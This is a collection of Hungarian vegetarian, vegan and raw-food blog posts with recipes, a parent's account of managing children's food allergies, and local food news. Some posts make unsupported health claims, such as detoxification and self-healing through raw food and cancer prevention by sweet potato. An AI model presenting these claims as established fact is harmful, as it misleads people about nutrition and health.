Január elején én is fogyókúrába kezdtem...:-) Hát ja, mióta a gyerekek mindketten ovisok, én pedig dolgozni kezdtem, sokszor csak a szendvics, kenyér, félkész kaja verziója maradt.. És ennek persze meglett az eredménye... A Kismama Magazin és a babaszoba.hu közösen indított egy 5 hetes virtuálisan követhető fogyókúrát, amiben többféle menü között lehetett választani, kifejezetten a családnak is főző, kevés idővel rendelkező kisgyerekes anyukáknak, mindig megjelölve, hogy a baba mit ehet meg belőle! (a menüket már levették a netről, majd nyáron lesz legközelebb megint!). Három féle menüből lehetett választani: szoptatós, magyaros éééés vegetáriánus! Én természetesen utóbbit választottam, és bár alapból tej- és tojástartalmú vega étrend volt, igyekeztem a legtöbb helyen a vegán helyettesítéseket alkalmazni. Nagyon változatos, sok finom ötletben bővelkedő menü. Hozzászoktam a kevesebb szénhidráthoz, ismét a sok nyers zöldséghez, gyümölcshöz, újból a minimális édesítéshez. Az 5 hét elteltével újrakezdtem a diétát (-4 kg eddig, de van még 3 kg, amit le kellene dobni...) , és ma ez volt az ebédem. Tök egyszerű, de nagyon finom!:-) Így diétásan elment ebédre, amúgy vacsorára javallanám.:-) Ez a szép színes összeállítás pedig a reggelim volt egyik nap:-) Zöldséges batyu Hozzávalók (4 db batyuhoz): 2 db készen kapható teljes kiőrlésű réteslap (Tante Fanny) 1 édesköménygumó 1 fej hagyma 2 nagyobb sárgarépa 1 cukkini 2 fehérrépa 2-3 ek. borsó só őrölt gyömbér 1 ek. olívaolaj Az olajon megpirítjuk a fleaprított hagymát és a kis darabokra vágott édesköményt. Rászórjuk a durvára reszelt cukkinit, együtt pirítjuk kicsit, majd bele a többi aprított zöldség. Megfűszerezzük, és fedő alatt puhára pároljuk. Kihűlés után kezdjük el tölteni a batyukat. Egymásra terítjük a két réteslapot és ollóval egyenlő méretű négyzeteket vágunk ki. Középre halmozzuk a zöldséget, óvatosan ráhajtogatjuk a tésztát. Bekenjük a tetejét kis olajjal és 200 fokon kb. 20-25 perc alatt megsütjük. Vigyázat, gyorsan megéghet a teteje!
Szuper reggeli: Cukormentes fahéjas granola
2012. február 20. Zizi kalandjai
Folytatódik a szuper reggeli sorozat egy szintén egyszerű, 20 perc alatt elkészíthető finomsággal, a granolával. A granolát többnyire reggelire fogyasztják, de nasiként is megállja helyét (sőt ajánlott az egészségtelen snack food helyett). Alapját a zabpehely, olajos magvak és valamilyen édesítőszer képezik, adhatunk hozzá aszalt gyümölcsöket, jó minőségű csokoládét, megszórhatjuk kakaóval vagy kókuszreszelékkel... szóval rengeteg variánsa van. Az üzletekben kapható változatok többnyire édesítve vannak, ezért érdemes elkészíteni a saját házi verziónkat és így mi kontrolláljuk azt, hogy miből mennyi kerüljön bele. Nem beszélve arról, hogy a házi verzió olcsóbb. Üvegbe zárva hűvös helyen eláll 5-8 napig, de szerintem hamarabb el fog fogyni. A kihívás hónapjában természetesen cukormentes verziót készítettem. Az aranybarnára pirított magokat rizstejjel öntöttük fel, amely magában is édeskés ízű. Ha valaki mindenképpen szeretné édesebbé tenni, adjon hozzá 1-2 evőkanál mézet, nádcukrot vagy juharszirupot. Az elkészült granolát összekeverhetjük joghurttal, tejjel, egyéb növényi tejekkel vagy friss gyümölcsökkel is. A recept ötlete Maria-tól származik, akinek rengeteg inspiráló vegán és cukormentes receptje van. Sok mindent készítettem már a blogján található receptek közül. Cukormentes fahéjas granola Hozzávalók 2 főre: - 70 g dió - 30 g kesudió - 30 g mandula - 70 g kókusz chips - 20 g chia mag (lenmag vagy szezámmag is használható helyette) - 20 g kókuszolaj (vaj is használható helyette) - 1 teáskanál fahéj Melegítsük elő a sütőt 120C fokra. Egy tálban keverjük össze az összes hozzávalót, majd egyenletesen öntsük rá egy sütőpapírral bélelt tepsire. Süssük 10-15 percig, amíg a magok aranybarnára pirulnak. Félidőben egy kanállal keverjük át, hogy egyenletesen megsüljön. További cukormentes vegán receptekért katt ide. *** Cukormentes olvasnivalók :) William Dufty: Cukor blues (Kétezeregy Kiadó) Vitaminsziget: Fehér méreg: a cukor Chrash Test Mummy: 5 Reasons Why I Wont Take Sugar Back Sarah Wilson: I Quit Sugar The New York Times: Is Sugar Toxic?
zöldségek & kencék, avagy eszel elég zöldséget?
2012. február 20. Vegasztrománia
télen nagyon észnél kell lenni. elég egy dolgozósabb időszak (konstans), emiatt belazult fegyelem, és máris kész a baj. ha nem eszem elég zöldséget, gyümölcsöt, fáradékonyabb leszek és őrlángon égek. most azt hiszem, sikerült elkapni a megfelelő pillanatot, és rendet tenni a kiegyensúlyozott táplálkozás terén. á - mivel ő is hasonló cipőben járt - találta ki, hogy milyen ünnepi formát adjunk a nagy visszatérésnek, vasárnap zöldségorgiát rendeztünk. zöldségek & kencék előételnek, vagy buli-kajának is nagyon megállja a helyét. szeleteljünk fel minél több zöldséget (répát, karalábét, pritaminpaprikát, zellerszárat, lila hagymát, édesköményt - zseniális) és zöld almát, pirítsunk meg néhány szelet háromszögre vágott kenyeret (nekem most tönkölykenyér volt otthon) és helyezzük el egy nagy tálon, vagy vágódeszkán. elég egyféle mártogatóst is csinálnunk, de minél többel készülünk, annál komplexebb az élmény. tegnap 3 krémet készítettünk: a maga egyszerűségében nagyszerű diós-márványsajtos mártogatóst, zakuszkát, és mentás zöldborsókrémet. a zakuszkát még én is többféleképpen készítem, van a rapid-változat időhiány, vagy lusta nap esetére, van a kifinomult (és legjobb) variáció, amikor szabad tűzön, lehetőleg mindent külön párolunk-sütünk meg és a végén állítjuk össze (ezt szezonban és nagy mennyiség esetén érdemes így készíteni), és van az arany középút, amit most is követtem. ebben az esetben villával szurkáljunk meg egy nagyobb padlizsánt, és süssük meg jól sütőben. közben olívaolajon (ne sajnáljuk) pirítsunk meg 1-2 fej kockára vágott hagymát, néhány gerezd apróra vágott fokhagymát, 1 nagyobb ledarált kápiapaprikát, 2 kockára vágott paradicsomot sóval, borssal és babérlevéllel. ja, és persze van a legjobb, leggyorsabb verzió, ha csak leveszed a polcról.. a mentás zöldborsókrémhez (ami nyilván a borsó szezonjában a legjobb, de most sem volt rossz..) pároljunk meg 250 g zöldborsót (most fagyasztottból készült), turmixoljuk össze egy kevés vajjal, vagy olívaolajjal, majd keverjük össze 125 g (1 doboz) philadelphia sajtkrémmel (vagy mascarponéval), összevágott mentával, sóval és frissen őrölt fehér borssal, és a végén facsarjunk hozzá egy kevés citromlevet. +1 ötlet: a mai szendvicsemet a zöldborsókrém ihlette: baguette + zöldborsókrém + camembert + majonéz + saláta + zöld alma. a bejegyzés írása közben teszteltem, isteni..
Na, ki jön hozzánk főzni?
Az utóbbi időben asszem teljesen felülmúlja a képességeimet a családom igényei/elvárásai/lehetőségei szerinti étlap-összeállítás-főzés....:-(((( A napi 5 étkezés varázslata lassan a lehetetlennel egyenértékű ... A helyzet a következő: - a 6 éves: továbbra is a tejallergia és tojásallergia, előtérbe került a gluténérzékenység (a gabonaféléktől is nagyon fáj a hasa), gyümölcscukor-érzékeny (3 éve nem eszik gyak. spontán gyümölcsöt), és már kakaó + paradicsom-allergia, édesítőfélék szintúgy. Zöldséget gyak. nem eszik, csak húst, tésztát és kenyeret. Húsevő. Mit eszik? Na, az jó kérdés! - a 3 éves: tavaly novemberben súlyos allergiás reakció, kórház (külön történet...). Nála jelenleg heves reakció a paradicsomra és összes citrusfélére, a citromsav-tartalom részösszetevőként sem mehet (pl. vega margarin, gyümölcslé, lekvárok, semmi). Ezen kívül allergiás lett a karobra, agar-agarra, pektinekre, lecitinekre, karragénre, guar-gumira, ... Nem rejtvény, ezeket tartalmazzák leginkább a vega készítmények. Ja, ő így evett az elmúlt években, ezekkel találkozott, ergo erre lett allergiás. Bogyósok aromái, adalékok. Húsevő, bár ő szerencsére eszik zöldséget, gyümölcsöt. - Férj: húsevő, enne sajtokat, tejtermékeket, morog, ha nincs, ha van, a gyerekek őrjöngenek, nekik miért nem... - én: maradtam vega, bár az utóbbi időben ettem időnként tejterméket (nem esett jól, nem is bírja a gyomrom...). Ha éppen vmit kitalálok a családnak, magamra már semmi energiám nem marad, szendvics-szendviccsel.. Szóval, amit az egyiknek lehet, a másiknak nem, amit az egyik szeret, a másik nem. Na, ki jön hozzánk főzni?:-)))
Mézes gyümölcsök
2012. február 12. Főzés nélkül finoman!
Ismét vasárnap reggel, ismét süt a nap, ismét csicseregnek a madarak, ismét adjunk valami csodásan mézes indítást a napnak. Hölgyeim, csak lassan élvezzék az ízeket... Ananász, mely illatával magához vonzza a lelket, Mandarin, mely színével megtölti a napot, Pomelo, mely édes fanyarságával megadja a kompozíció karakterét, és egy kevés lágyan csurgatott méz... Mennyei élvezeteket :))) Javed
Bővült a Vegafood nyersételes kínálata a Nyersétel Akadémia ételeivel!
2012. február 9. Gitta nyersétel blogja
A 7. héttől már rakott-töltött zöldségek kategóriában is tudsz rendelni a Vegafood vegetáriánus étel házhozszállító cégtől. Ezeket az élő fogásokat a Nyersétel Akadémián készítjük, a vegetáriánus futárcég pedig leszálltja neked. Az egészség házhoz megy, Budapest egész területén, és a környező településeken is meg lehet már kóstolni a legfinomabb nyers főételeket. Nincs időd vagy kedved elkészíteni? Nincs recepted? A nyers fasírtok mellett tudsz már második főételt is rendelni a jövő héttől itt: VEGAFOOD Február 13: Rakott savanyú káposzta Február 14: Cukkíni tekercsek édes-savanyú szósszal Február 15: Rakott brokkoli paprikával Február 16: Zöldség palacsinta céklás öntettel Február 17: Rakott répa céklával A február 14-i ebéd, cukkíni tekercsMinden ételünk szójamentes, tejmentes, cukormentes! Minden ételünk lisztmentes, vagyis nem tartalmaz glutént! Így lisztérzékenyek is fogyaszthatják! Hamarosan itt a tavasz, a méregtelenítés, böjt időszaka. Adj esélyt a szervezetednek, hogy az öngyógyító törekvések beinduljanak, kezdj el élő ételeket enni! Nem csak a mérlegen fogod látni a különbséget! Az élő édességek kínálata is kibővült, sok finom palacsintát, és más édességet tudsz rendelni. Ne feledd, liszt, tej és tojásmentesen, cukormentesen! A Nyersétel Akadémia elkészíti, a Vegafood házhoz viszi, neked csak meg kell rendelni.
2012. február 5. Főzés nélkül finoman!
Ahhoz, hogy igazán jól induljon a nap szükség van egy kis finomságra. Kedves női energiák, amikor készítettem ezt az ételkompozíciót, Rátok is gondoltam... A gyümölcssalátához mangót szeleteltem (egész vékonyra, és ehhez zöldséghámozót használtam, dekoratív dolgokat lehet készíteni, ezzel az egyszerű eszközzel), ananász következett (két-három ananász szelet, melyről levágtam a széleket és kiszedtem a kemény, sokszor szálkás belső részt), majd a mandarin (itt nincs különleges praktika, meghámoztam, felszeletelem :)))... Hogy kihagytam valamit? Igen, jól látjátok! Apró, kicsi, szárított gyümölcs, magas vitamin tartalommal. Ha tudjátok a gyümölcs nevét, megoszthatjátok velem és többiekkel vagy olvashatjátok Facebook/Javed Hungary oldalam, üzenőfalán, illetve itt a megjegyzés rovatban... Jó reggelt, és GyengÉdes Ébredést Drágák!
Gyümölcsös édesség
2012. január 30. Gitta nyersétel blogja
Egy gyors gyümölcsös édesség: az ételtársítás szabályainak ugyan nem felel meg, de nagyon finom. Egy héten egyszer megengedhetjük magunknak, hiszen szép is, finom is. gyümölcsös süti Ez most egy tálcán készült, de ha kerek tortaformába teszed, akkor gyümölcstortának is tálalhatod, és akkor még ünnepélyesebb. Hozzávalók (egy kb 30x20 cm-es tálcához) az alaphoz: 20 dkg áztatott dió (mandula is jó) 1 evőkanál aszalt-csíráztatott hajdina (ez elhagyható, de ettől lesz finom ropogós) 1 evőkanál kakaópor (cukrozatlan, lehetőleg bio) 1 evőkanál méz 2 evőkanál kókuszreszelék gyümölcsök: 2-3 kivi, 1 banán, 2 mandarin (vagy bármilyen más gyümölcs) Kesuhab a tetejére: 15 dkg kesudió, 1-2 kanál méz, 1/2 citrom leve 1,5 dl tiszta víz csipet vanília aroma a díszítéshez aszalt áfonya, citromfű levelek Csokis réteg, rajta a gyümölcsök Az alaphoz a hozzávalókat aprítógépben morzsásra aprítjuk. A hajdinától finom ropogós lesz, de nélküle is nagyon finom (hiánya ne akadályozzon meg az elkészítésében). Egy csokis, morzsás anyagot kapunk, amit belenyomkodunk egy tálca aljába. Erre szépen felkarikázunk tetszés szerinti gyümölcsöket (először olyan gyümölcssalátásan akartam, összekeverve, de a végén mégis ilyen katonás sor lett belőle...) És utána jöhet a kesuhab: a kesudiót a vízzel, mézzel, citromlével simára turmixoljuk, és gusztusosan a gyümölcsök tetejére öntjük. Aszalt gyümölcsökkel, zöld levelekkel díszítjük. Szépen lehet szeletelni Szépen lehet vágni, még az alja sem tapadt le. Egy pillanat alatt elfogyott...
Rakott savanyú káposzta II.
2012. január 17. Gitta nyersétel blogja
A tél egyik legkedveltebb szuperétele a savanyú káposzta. Magas C vitamin tartalmának köszönhetően egész télen frissen tart, erősíti az immunrendszerünket. Az igazi (önmagában, ecet nélkül savanyított) savanyú káposztában található jótékony baktériumok kedvező hatást gyakorolnak a bélflórára, így akadályozzák meg a káros baktériumok megtelepedését. Minden nap kellene enni ebből a gasztrocsodából! Csökkenti a koleszterinszintet, fogyaszt, méregtelenít, és nem mellékesen FINOM! Kérlek ne főzd meg! Nyersen tudod megőrizni legjobban az értékes tápanyagokat! savanyú káposzta pirospaprikával fűszerezve A Nyersétel Akadémián többféle rakott savanyú káposztát készítünk, egyik finomabb, mint a másik. Tamás káposztája dús, morzsás, fűszeres. Peti káposztája lágyabb, szaftosabb, könnyebb. Annyira szeretem a savanyú káposztát, hogy most itthon is készítettem egy saját verziót, szabadjára engedve fantáziámat. Ebből a mennyiségből legalább 6 ember tud jól lakni, de ha kisebb adagokat vágsz, akkor 8 is. Egy régi recept itt: Rakott savanyú káposzta Rakott savanyú káposzta nyersen Hozzávalók: 40 dkg savanyú káposzta 15 dkg paradicsom-paprika-lilahagyma együtt (külön-külön nem tudom mennyi volt, de kb. egyformák voltak) pici hidegen sajtolt olaj 20 dkg áztatott dió (ez a beáztatott dióra vonatkozik, kb 15 dkg száraz diónak felel meg) 2 gerezd fokhagyma, pici só 20 dkg répa keverék: sárgarépa, zeller, hagyma vegyesen, (a sárgarépából van benne a legtöbb) pici só, ételízesítő ízlés szerint két marék zöld levél, ezt nem mértem le. Bármilyen lehet, spenót, saláta, mángold, stb. 10 dkg napraforgó (ezt be kell áztatni legalább 1 órára, de jobb kettőre), 1 teáskanál citromlé, pici só, pici méz A savanyú káposztát leöblítjük (én nem tettem, és így túl intenzív volt az íze. úgy gondoltam, hogy a lében elég sok értékes anyag van, ne öntsük le a lefolyóba. De úgy is ki lehet mosni, hogy a vizet felfogjuk és megisszuk). A paprika-paradicsom-hagyma hármast kevés vízzel turmixgépbe tesszük és simára turmixoljuk. Ezt ráöntjük a káposztára, jól összekeverjük. A beáztatott dióból a fokhagymával és a sóval elkészítjük a diós tölteléket: aprítógépbe tesszük. A répás tölteléket is betesszük a konyhai robotgépbe, és morzsásra aprítjuk. (a diós massza után a gép tálját nem kell elmosni, nem árt egy kis dió a répának) Fűszerezzük, kóstoljuk. A salátát (vagy más zöld levelet) megmossuk, és késsel kicsit megszabdaljuk. Összeállítás: Egy kisebb tepsi aljára letesszük a káposzta felét, erre jön a diós töltelék, erre a zöld levelek. Egyenletesen elrendezzük a leveleket, és jól lenyomkodjuk. A leveles rétegre ráöntjük a répás tölteléket, ezt is egyenletesen elterítjük. A savanyú káposzta másik felét rátesszük a tetejére. Erre jön még egy magból készült tejföl, amitől krémes és lágy lesz: a beáztatott napraforgó magot kevés vízzel, sóval, mézzel, citromlével teljesen sima, tejfölszerű állagra turmixoljuk. A káposztára öntjük. A tetejét megszórhatjuk apróra vágott petrezselyemmel. (a zöld rétegbe is mehet a petrezselyem, illik bele) Nem sikerült szépen felvágni, így azt már nem fotóztam le. De így is látszanak a rétegek, nagyon finom, és illatos és szép is.
Közétkeztetés helyi biozöldségekkel
Nagykamaráson biozöldség termesztésébe kezdett az önkormányzat. Céljuk, hogy az ott élő idősek és a gyerekek - közétkeztetés keretein belül - egészséges, friss élelmiszerhez jussanak. A kertészet nem csak egészséges élelmiszert, de jelentős megtakarításokat és viruló közösséget is jelent a helyiek számára. A nagykamarási kezdeményezés égisze alatt jelenleg 3 hektárt művelnek meg. Biokertészkedést folytatnak, így nem csak helyi termék a végeredmény, de egyben egészséges élelmiszerről is beszélünk. Sőt, környezetbarátról, hiszen vegyszermentesen termesztett zöldségfélék kerülnek ki a kertből, s a szállítással járó levegőszennyezés és egyébb környezetterhelés is elmarad - helyi termelésről és helyi felhasználásról lévén szó. Ezzel a tevékenységgel évente közel 2 millió forintot spórol meg az önkormányzat; ráadásul mivel az alapanyagot maga állítja elő, a közeljövőben valószínűleg nem kell a közétkeztetésben árat emelnie. További előny, hogy jó termés esetén a hivatal - a pénzbeli támogatás mellett - természetben is tudja a rászoruló családokat segíteni: egy-egy zsák burgonyával vagy egyéb zöldséggel. Az önkormányzat kertjében dolgozók számára is több haszonnal jár a munka: kiegészítő pénzkereseti lehetőség és nem utolsó sorban közösséghez tartozónak érzik magukat; saját bevallásuk szerint jó együtt munkálkodni. Az itt dolgozókat az önkormányzat támogatási forrásokból, munkaügyi központ segítségével foglalkoztatja. A nagyszerű kezdeményezés a józan paraszti ész logikáját követi, jó szívvel ajánlható minden hazai önkormányzat figyelmébe! forrás: tudatoslet.hu
Meghívó: Nyers vegán ínyenc vacsora - Kelet-Nyugat fúziója
Az új évben is folytatódnak vacsoráink! Január 28-án a keleti és a nyugati konyha összekapcsolódása, fúziója lesz a téma. Várunk szeretettel! Továbbra is rendelhetők nyers vegán csomagolt termékeink (www.eletkonyha.hu), illetve vállaljuk rendezvényeken catering szolgáltatást. Legyen 2012 egy egészségben gazdag éved! January 28. (szombat/saturday) 18.00 Kelet-Nyugat fúziós vacsora / East-West fusion dinner http://www.facebook.com/events/337671652918962/ MENÜ/MENU: Tárkonyos citrus saláta /Citrus salad with tarragon Édesköményleves korianderes tök chips-szel/ Fennel soup with coriander pumpkin chips Fűszeres mogyorós tészta lime-mal és gyömbérrel/ Spicy peanut noodles with lime and ginger Sütőtökös tiramisu/ Pumpkin tiramisu Petit fours
ÍNYENC VACSORA NYERS VEGÁN ÉTELEKKEL
Folytatódik a sürgés- forgás az Élet Konyhában. Rengeteg tervünk van Ágival (az ő blogján találtok képes beszámolót a tavalyi japán vacsoránkról) a 2012-es évre. Január 28-án máris lesz egy vacsoránk, ahol egy picit eltávolodunk a hazai szezonális termékektől. Nem teljesen persze, de kell egy kis izgalom a sok sütőtökkrém leves és céklás vagy káposztás ételek után. Íme a menü: Tárkonyos citrussaláta Édesköményleves korianderes tök chips-szel Fűszeres, mogyorós metélt lime-mal és gyömbérrel Sütőtökös tiramisu Petit Fours Meglepetés bonbonok kedvcsináló :) Szeretettel várunk Benneteket! info@eletkonyha.hu
Búzahús(szejtán) készítése házilag
2012. január 11. A vegán szépség
Hozzávalók: -250 gramm sikérpor(szejtánpor) -só, bors, zöldfűszerek, vegamix -1kk szódabikarbóna Mi a szejtán? A vegetáriánusok körében nagyon közkedvelt alapanyag a szejtán, amelyet húspótlóként tartanak számon. Por állagú, amely nálunk többnyire tönkölybúzából készül, de elvileg készíthető más gabonából is. Sokoldalúan felhasználható, hasonlóképpen mint a hús. Készítésének pontos leírása: A tönkölyjava (búzahús, szejtán) szétválasztásos eljárással készül, amelynek az a lényege, hogy a tönkölylisztből tisztított víz és tengeri só hozzáadásával tésztát készítenek. Pihentetés után vízzel a keményítő nagy részét és a tönkölyfehérjét az erre a célra kifejlesztett berendezésben szétválasztják, csökkentve ezzel a gabonában található szénhidráttartalmat. Ezután a kinyert koncentrátumot vízzel átmossák, majd különböző formákban hőkezelik. A gyártási folyamat végén a tömbös szejtánt darabolják, szeletelik és vákuumcsomagolásban forgalmazzák. - írja az Új diéta. Honnan származik? A szejtán legtöbbször tönkölybúzából készül. A tönkölybúza Mezopotámiából származik, Európába is már a bronzkor ideje óta honos. A Kárpát-medencében régóta használják a mai kenyerek őseinek elkészítéséhez. A IV. században élte fénykorát, amikor az időjárás szélsőségei és a betegségek miatt a többi gabonaféle nem termett, a tönköly viszont virult. Egy időre feledésbe merült, de napjainkban megint nagyon közkedvelt lett. Mit tartalmaz? Fehérjén kívül tartalmazza még szint az egész B-vitamin családot, niacint, E-vitamint, rezet, vasat, mangánt, cinket, magnéziumot, kalciumot, foszfort és szelént. Mi készüljön belőle? Bármi, ami szeletelt húsokból készülhet(ragu, aprólék, Brassói, gyros, de akár ránthatjuk, vagy tempura-sör, palacsintatésztába is mártogathatjuk. Húsdarálón, vagy gépben ledarálva pedig darálthúsként használhatjuk fel fasírtokhoz, bolognai szószhoz, vagy töltött káposztába stb...Tipp: Ha túl sokat készítettünk akkor a maradékot lefagyaszthatjuk, vagy főzővizével egy hétig hűtőben is tárolhatjuk.
Gyógyító ételeink- alma
A rovat első főszereplője az évszaknak megfelelően: az alma. Az alma számos kedvező hatással bír, és mindenki számára könnyen hozzáférhető. 1. antioxidáns hatás: az alma héja rendkívül gazdag antioxidánsokban, melyek képesek megkötni a szervezetben keletkező szabad gyököket. A szabad gyökök felelősek az öregedésért, valamint betegségek kialakulásában játszanak szerepet (érelmeszesedés, daganatos betegségek stb.). Így aztán eszünkbe ne jusson megszabadítani a héjától mielőtt megesszük, mivel ezzel a legértékesebb része kerül a szemétbe! 2. anyagcserét serkentő hatás: rostanyagokban gazdag, mely vízzel érintkezve megduzzad, ezáltal lazítja a székletet, és megkönnyíti annak ürítését. Tehát székrekedési panaszok ellen kiváló! 3. koleszterinszint csökkentő hatás: rostjai nem csupán a vizet képesek megkötni, hanem a koleszterin vérbe való jutását is csökkenti képes. 4. vitamin és ásványi anyag tartalom: legjelentősebb a C-vitamin tartalma, mely a héj alatti húsrétegben található. Ásványi anyagok közül kálium, bór, cink, mangán és fluor található benne. A 100%-os almalevek fogyasztása is jótékony hatással van szervezetünkre. Ha tehetjük, szűretlen leveket fogyasszunk! Keressétek almás receptjeinket! ;) Ani
Áfonyás, alma csatni
2011. december 31. Csatni és Umeboshi: Jógakonyha
A Karácsonyi kollekció darabja volt, ajándéknak szántam, illetve az ünnepi asztalra. Ezúttal megpróbálkoztam azzal, hogy ezt az indiai behatású étvágygerjesztőt, a makrobiotika szabályai szerint készítsem el, cukor helyett rizssziruppal és almaecettel. Hozzávalók: 1 kiskanál kukorica olaj, 1 kg feldarabolt alma, 10 dkg aszalt áfonya, kb. 2/3 bögre rizsszirup 4 fej lila hagyma felszeletelve, 1 kiskanál reszelt gyömbér, csipetni fahéj, kb 0,5 dl almaecet. 1./ Egy csipetnyi olajon fonnyasszuk meg a hagymát, majd dobjuk rá az áfonya kivételételével az összes hozzávalót. 2./ Főzzük addig, amíg megpuhulnak, legalább 50 percig. Ekkor adjuk hozzá az áfonyát is. Főzzük még együtt vagy 15 percig. Ízesítsük kedvünkre, hogy kellemesen édes-savanykás ízt kapjunk. 3./ Még melegen töltsük sterilizált üvegekbe, és dunsztoljuk, így 6 hónapig biztosan eláll.
Kakukkfüves édesburgonya
2011. december 26. A vegán szépség
Hozzávalók: -1kg édesburgonya -2 mokkáskanál kakukkfű -olívaolaj, -só, bors, vegamix -4 gerezd fokhagyma -1-2 db lilahagyma -átlátszó nejlonzacskó, vagy sütőzacskó A szubtrópusok egyik legfontosabb népélelmezési cikke az édesburgonya (Ipomoea batatas (L.) Lam), amelyet óceániai útleírásokból kumara, spanyol nyelvterületeken batáta, egy japán étterembe térve pedig satsuma-imo néven ismerhetünk. A magyar neve megtévesztő, ugyanis bár a megvastagodott tároló-gyökere, amelyet étkezéshez használnak, nagyon hasonlít a mérsékelt égöv burgonyájához, de rendszertani besorolása szerint nem burgonyaféle, hanem a szulákfélék nemzetségébe tartozó, évelő növény. Maga a növény sem hasonlít a burgonyához: hosszú, kúszó indái vannak, levelei nagyok, szív alakúak, virágai hasonlóak a hajnalkáéhoz, illetve a nálunk szulák néven ismert gyomnövény virágaihoz. Elsősorban megvastagodott tároló-gyökeréért termesztik, amelyből növényenként általában 4-10 darab alakul ki. Ezek felülete fehér, barnás, narancssárga, pirosas bíbor, a hús színe fehér, narancssárga vagy piros. Két alapvető fajtája (és mindkettőnek számos alfaja) van: az egyiknek fehér, vagy világos szürke színű a húsa, a bőre pedig mély lila színű, íze a szelídgesztenyére hasonlít. A másik fajta húsa sötét narancssárga, bőre sárgás színű. Ennek az íze a legédesebb sütőtök ízére hasonlít. Amerika trópusi részein őshonos, de Amerikától Afrikán és Délkelet-Ázsián keresztül Óceániáig a világ szinte összes trópusi, szubtrópusi vidékén termesztik, sőt, az egyik legfontosabb népélelmezési cikként tartják számon. A termesztése és a fogyasztása például az Egyesült Államok déli államaiban a burgonyánál nagyobb arányú. A legtöbbet Brazíliában termesztenek belőle, ahol a szeszgyártásnak is alapanyagául szolgál. Miért jó? Az édesburgonya húsos, gumószerűen megvastagodott gyökere szénhidrátban és (különösen a sárga húsú fajta) béta-karotinban gazdag. C-vitamin-tartalma 15-30 mg/100 g, de tartalmaz B1, B2, B6, és E vitaminokat is. A többi zöldségféléhez képest sok, 1,5-2 g/100 g fehérje található benne, amelynek összetétele a tojáséhoz hasonló. Délkelet-Ázsiában a zsenge leveleit, hajtásait is fogyasztják, ezekben a gyökerénél is több a C-vitamin és a béta-karotin. Értékes ásványi anyagokat tartalmaz: kalcium, vas, magnézium, mangán, kálium, foszfor, nátrium, szelén, réz és cink is található benne. Egy perui kutatóközpont, a Limában működő Nemzetközi Burgonyaközpont (CIP) szakértője, Daniel Reynoso Tantalean az édesburgonyával foglalkozó tanulmányában azt állítja, hogy a batátának gazdag ásványi anyagtartalma miatt daganatmegelőző hatása is van, csökkenti a gyomorrák és a májbetegségek kockázatát és antioxidánsai, vitaminjai és proteinjei segítenek megőrizni a fiatalságot. Energiatartalma száz grammban 117 kalória, így akár a fogyókúrázók is beleilleszthetik az étrendjükbe. Hogyan fogyasszuk? Az édesburgonya gumóit sütve, párolva, grillezve, főzve, pürésítve, húsok mellé köretként vagy főzelékként fogyaszthatjuk, édes sütemény, lepény is készülhet belőle. Remek alapanyaga lehet az egyéni kísérletezéseknek, általában elmondható, hogy a rebarbara, a sütőtök és a burgonya felhasználási módjaihoz hasonlít a felhasználási területe. Trópusi termesztő helyein - ahol a mennyiség nem akadály, hiszen az erre szakosodott gazdaságokban tonnaszámra termesztik és egyes fajtákon több kilós gumóóriások is előfordulnak -, a lisztjéből kenyeret sütnek, keményítőnek is feldolgozzák illetve szeszt is főznek belőle. Tippek-tanácsok Nagyobb hipermarketekben, zöldség-gyümölcs üzletekben Magyarországon is kapható. Ha édesburgonyát vásárolunk, vigyázzunk, hogy friss legyen - ilyenkor a bőre feszes, sima. Nagy nedvességtartalma miatt csak néhány napig tárolható, és inkább száraz, hűvös helyen, mint hűtőszekrényben ajánlatosabb tartani a felhasználásáig. Előkészítése, tisztítása hasonlóképpen történhet, minta burgonyának: lehet hámozni, vagy csak vizesen ledörzsölni, kaparni is a héját, de megsüthető a héjában is. forrás:herba-fitt.hu
karácsonyi kelt kocka
2011. december 20. Mentesreceptek
A szokásos kenyértésztám édes változatát készítettem el: 20-30 ml olivaolajat kiöntök egy 2,5 dl-s csészébe, felöntöm meleg vízzel, majd még 2 csésze meleg vizet öntök hozzá egy nagy (5,4 l), zárható műanyag dobozban. 2 ek cukrot, 1 tk sót szórok bele és egy csomag friss élesztőt morzsolok rá (szárítottal is működik). Belemérek 800 g lisztet (általában 500 g finomlisztet és 300 g grahamlisztet). Egy késsel összekavarom. Ráteszem a doboz tetejét, csak egy résnyire hagyom nyitva. Addig kelesztem, míg a doboz meg nem telik (kb. 3x-osra nő). Ennek nagyobbik feléből készítettem 12 db túrósbélest muffinformában és a maradékból csináltam a kockát. Saccra 300 g liszt, 1 ek cukor, fél tk só, 10 ml olivaolaj, 3,5 dl víz lehetett (bocs). Amikor megkelt, négy részre osztottam és jó vékonyra nyújtottam. Az elsőt 15 dkg mák, 1dl (növényi) tej és két nagyon csapott ek cukorral megfőzött krémmel kentem meg. A másodikra hámozott almát szeleteltem, a harmadikra 15 dkg dió, 1dl (növényi) tej és két nagyon csapott ek cukorral megfőzött krémet kentem. A negyedikkel lefedtem és kb. 40 perc alatt zsemleszínűre sütöttem. Még melegen megkentem a tetejét baracklekvárral.
Medvehagyma pesto - Pesto másképp
Nem tudom ki mennyire ismeri a medvehagymát, én eddig soha nem ettem, mivel nálunk Békés megyében nem jellemző növény. Ám a héten sikerült hozzájutnom egy jó nagy csokorhoz egyik kedves barátnőm jóvoltából. :) Először kicsit furcsa volt, íze a fokhagymáéhoz hasonló. Kicsit utána olvastam, és kiderült, hogy a medvehagyma fokozza az étvágyat és jótékonyan befolyásolja az emésztőrendszer működését is. Vérnyomás és koleszterin szint csökkentő hatása van, C-vitaminban gazdag. Légúti megbetegedések megelőzésére, emésztési zavarok esetén is alkalmazzák. Borogatásként gombás fertőzéseknél is hatékony lehet. Barátnőm javaslatára pogácsákat készítettem belőle, majd a maradék levelekből pesto készült: Hozzávalók: 1 marék fenyőmag vagy napraforgó 1 csokor medvehagyma olaj só,bors 1. A fenyőmagot vagy napraforgó magot egy serpenyőben olaj nélkül megpirítom. 2. A medvehagyma leveleit nagyobb darabokra vágom. 3. A pirított magokat és leveleket botmixerrel felaprítom, majd ízlés szerint ízestjük sóval, borssal. 4. Végül annyi olajat öntök hozzá, amennyit felvesz. A kész pestot jól záródó üvegbe teszem, esetleg reszelt parmezánnal tovább ízesíthető. A receptet itt találtam: www.nosalty.hu Ani :-) 2011. április
Mákos pite
2011. december 16. Gitta nyersétel blogja
